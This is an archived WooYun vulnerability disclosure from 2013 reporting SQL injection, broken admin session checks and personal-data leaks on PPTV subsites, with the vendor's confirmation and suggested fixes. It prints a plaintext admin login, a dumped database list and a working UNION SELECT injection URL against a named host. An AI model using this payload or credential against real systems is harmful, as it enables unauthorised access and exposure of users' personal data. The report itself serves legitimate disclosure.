当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-028528

漏洞标题: PPTV某分站SQL盲注一个&后台注射一枚可跨许多库&后台session混乱&信息泄露&被恶意应用SEO等等

相关厂商:PPTV(PPlive)

漏洞作者: godlong

提交时间:2013-07-11 11:15

修复时间:2013-08-25 11:15

公开时间:2013-08-25 11:15

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-07-11: 细节已通知厂商并且等待厂商处理中
2013-07-11: 厂商已经确认,细节仅向厂商公开
2013-07-21: 细节向核心白帽子及相关领域专家公开
2013-07-31: 细节向普通白帽子公开
2013-08-10: 细节向实习白帽子公开
2013-08-25: 细节向公众公开

简要描述:

6月初进行的测试,给忘记提交了,不好意思。未做任何破坏。
zone.pptv.com的问题相当大,请好好修复下。甚至影响到了其他分站了,比如kefu.pptv.com还有其他

详细说明:

无意看到的这个活动页面,存在SQL blind injection,通过这个盲注得到了杜蕾斯活动的一个后台,解密MD5登陆后台,以为到此就结束了
不料登陆了子站的一个后台后,其他的后台都免登陆了...谷歌inurl:zone.pptv.com找到了几个活动的后台,其中个人信息挺多的...算信息泄露了吧,
不过kefu.pptv.com的库也在这个mysql服务器上,但是因为DZ和主站整合了,password并未保存,所以密码倒是没泄露.
http://zone.pptv.com/durex/admin/index admin / pplive.com456
库名:

available databases [57]:
[*] information_schema
[*] inny
[*] inyy
[*] pp_hezuo_bench
[*] pp_hezuo_guangfa
[*] pp_hezuo_porsche
[*]
pp_hezuo_shj
[*]
pp_hezuo_swarovski
[*] pp_hezuo_watsons
[*]
pp_watsons
[*] pp_zo_beach
[*]
pp_zo_cocacola
[*] pp_zo_hkqc
[*]
pp_zo_ie9
[*] pp_zo_inyy
[*]
pp_zo_jw
[*] pp_zo_kia
[*]
pp_zo_ksf
[*] pp_zo_lenovo
[*]
pp_zo_lottery
[*] pp_zo_nanhang
[*]
pp_zo_pxld
[*] pp_zo_shop
[*]
pp_zo_taotao
[*] pp_zo_tianwang
[*]
pp_zo_tytdr
[*] pp_zo_vmei
[*]
pp_zo_xinsilu
[*] pp_zo_yf
[*]
pp_zo_zfxf
[*] pp_zo_zhenqiao
[*]
pp_zone
[*] pp_zone_public
[*]
pplive_10yi
[*] pplive_bianxing
[*]
pplive_btvcw
[*]
pplive_ctf
[*]
pplive_durex
[*] pplive_ef
[*]
pplive_flowers
[*] pplive_gdb
[*]
pplive_guangfa
[*] pplive_heiren
[*] pplive_jingcai
[*] pplive_jingcai_new
[*] pplive_jinzhong
[*] pplive_kefu
[*] pplive_ksf
[*] pplive_modelmatch
[*] pplive_oth_jxzh
[*] pplive_paipai
[*] pplive_rss
[*] pplive_seventh
[*] pplive_taifu
[*] pplive_talent
[*] pplive_talent2011
[*] pplive_worldcup


截取几张图,希望快快修复!另外http://s1.xxcq.g.pptv.com/敏感信息泄露。http://allstartv.pptv.com/home.php?mod=space&uid=15770&do=blog&id=22723被恶意应用作为SEO。http://zone.pptv.com/tianwang/index/search?name=panjinke 注射点http://zone.pptv.com/vmei/admin/account/add?id=-131%20union%20select%201,version%28%29,3,user%28%29,5,6,7,8,9,10后台注射(通过前面的漏洞进入任意一个zone子站后台,比如杜蕾斯,可以直接访问vmei/admin,应该是session验证问题)。几个活动的后台含有很多个人信息,注意防护。后台注意ip限制。插入点测试时候的截图,未作任何破坏。

SEO.png

后台.png

2.png

后台4-美女信息泄露泄露.png

4-身份泄露.png

后台信息泄露.png

无标题.png

注射点.png

库.png


kefu_cdb_members.png

漏洞证明:

同详细说明

修复方案:

SQL注射:过滤或上WAF
后台session验证问题:修改关键代码
后台口令设置复杂点,或者换一种加密算法

版权声明:转载请注明来源 godlong@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-07-11 11:31

厂商回复:

thx

最新状态:

暂无


漏洞评价:

评论